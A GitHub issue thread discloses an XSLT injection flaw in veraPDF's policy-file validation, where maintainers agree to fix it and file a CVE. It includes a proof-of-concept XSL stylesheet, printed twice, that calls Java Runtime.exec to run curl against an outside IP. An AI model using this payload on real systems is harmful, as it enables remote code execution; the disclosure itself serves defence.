You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The issue occurs when clicking the execution button, where users can drag and drop policy files into the area where a policy file is not chosen. These policy files are user-controllable, and during the validation of configuration files, an XSL transformation operation is performed. The XSL file used for this operation is uploaded by the user. Due to veraPDF not setting secure parameters during XSL transformation, this could potentially lead to a remote code execution (RCE) vulnerability.
test.xsl <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'curl http://101.200.214.173:8888 ')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet>
The text was updated successfully, but these errors were encountered:
@c1gar非常感谢您向我们指出这个问题。尽快修复
Thank you for your response. Can you assign a CVE identifier? Assigning a CVE is an encouragement for me to explore the risks of the veraPDF project. I would be very happy if you could assign a CVE identifier.
Thank you for your response. Can you assign a CVE identifier? Assigning a CVE is an encouragement for me to explore the risks of the veraPDF project. I would be very happy if you could assign a CVE identifier.
We have filled in the appropriate application and submitted a request that is awaiting review. You are credited as the reporter. We will publish as and when the review process allows. Thanks for reporting this.
The issue occurs when clicking the execution button, where users can drag and drop policy files into the area where a policy file is not chosen. These policy files are user-controllable, and during the validation of configuration files, an XSL transformation operation is performed. The XSL file used for this operation is uploaded by the user. Due to veraPDF not setting secure parameters during XSL transformation, this could potentially lead to a remote code execution (RCE) vulnerability.
![1111](https://private-user-images.githubusercontent.com/143704466/309138792-e466360b-bed3-417b-9993-3fad048bec72.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzk0ODQ5MzUsIm5iZiI6MTczOTQ4NDYzNSwicGF0aCI6Ii8xNDM3MDQ0NjYvMzA5MTM4NzkyLWU0NjYzNjBiLWJlZDMtNDE3Yi05OTkzLTNmYWQwNDhiZWM3Mi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjEzJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxM1QyMjEwMzVaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wMWQ2NDcyODczY2MzYTllOWVlNjJkMzFlMDg4N2U3YjgzNTIyMThhNDAxNjJlMjM0N2JjY2MzNjI0MmEzY2Q1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.wrv4TrXk2JixV-yjQ_p_zeKsmmJM5Fw226oVIQL72_E)
![Uploading 222).PNG…]()
test.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,'curl http://101.200.214.173:8888 ')"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet>
The text was updated successfully, but these errors were encountered: